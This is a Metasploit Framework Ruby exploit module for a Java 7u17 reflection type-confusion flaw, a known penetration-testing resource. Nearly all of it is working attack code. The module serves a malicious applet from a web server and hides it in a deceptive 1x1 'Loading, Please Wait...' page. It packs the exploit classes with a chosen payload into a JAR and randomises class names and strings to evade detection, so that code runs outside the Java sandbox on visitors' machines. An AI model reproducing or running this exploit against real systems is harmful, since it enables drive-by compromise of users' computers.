##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE

  include Msf::Exploit::Remote::BrowserAutopwn
  autopwn_info({ :javascript => false })

  def initialize( info = {} )

    super( update_info( info,
      'Name'          => 'Java Applet Reflection Type Confusion Remote Code Execution',
      'Description'   => %q{
          This module abuses Java Reflection to generate a Type Confusion, due to a weak
        access control when setting final fields on static classes, and run code outside of
        the Java Sandbox. The vulnerability affects Java version 7u17 and earlier. This
        exploit doesn't bypass click-to-play, so the user must accept the java warning in
        order to run the malicious applet.
      },
      'License'       => MSF_LICENSE,
      'Author'        =>
        [
          'Jeroen Frijters', # Vulnerability discovery and PoC
          'juan vazquez' # Metasploit module
        ],
      'References'    =>
        [
          [ 'URL', 'http://weblog.ikvm.net/PermaLink.aspx?guid=acd2dd6d-1028-4996-95df-efa42ac237f0' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpuapr2013-1928497.html' ]
        ],
      'Platform'      => [ 'java', 'win', 'osx', 'linux' ],
      'Payload'       => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'       =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => ['java'],
              'Arch' => ARCH_JAVA,
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86,
            }
          ],
          [ 'Mac OS X x86 (Native Payload)',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_X86,
            }
          ],
          [ 'Linux x86 (Native Payload)',
            {
              'Platform' => 'linux',
              'Arch' => ARCH_X86,
            }
          ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jan 10 2013'
    ))
  end


  def setup
    path = File.join(Msf::Config.install_root, "data", "exploits", "jre7u17", "Exploit.class")
    @exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.install_root, "data", "exploits", "jre7u17", "Union1.class")
    @union1_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.install_root, "data", "exploits", "jre7u17", "Union2.class")
    @union2_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.install_root, "data", "exploits", "jre7u17", "SystemClass.class")
    @system_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    @exploit_class_name = rand_text_alpha("Exploit".length)
    @exploit_class.gsub!("Exploit", @exploit_class_name)
    super
  end

  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      jar = payload.encoded_jar
      jar.add_file("#{@exploit_class_name}.class", @exploit_class)
      jar.add_file("Union1.class", @union1_class)
      jar.add_file("Union2.class", @union2_class)
      jar.add_file("SystemClass.class", @system_class)
      metasploit_str = rand_text_alpha("metasploit".length)
      payload_str = rand_text_alpha("payload".length)
      jar.entries.each { |entry|
        entry.name.gsub!("metasploit", metasploit_str)
        entry.name.gsub!("Payload", payload_str)
        entry.data = entry.data.gsub("metasploit", metasploit_str)
        entry.data = entry.data.gsub("Payload", payload_str)
      }
      jar.build_manifest

      send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      payload = regenerate_payload(cli)
      if not payload
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource() + '/', '')
    end

  end

  def generate_html
    html  = %Q|<html><head><title>Loading, Please Wait...</title></head>|
    html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
    html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1">|
    html += %Q|</applet></body></html>|
    return html
  end

end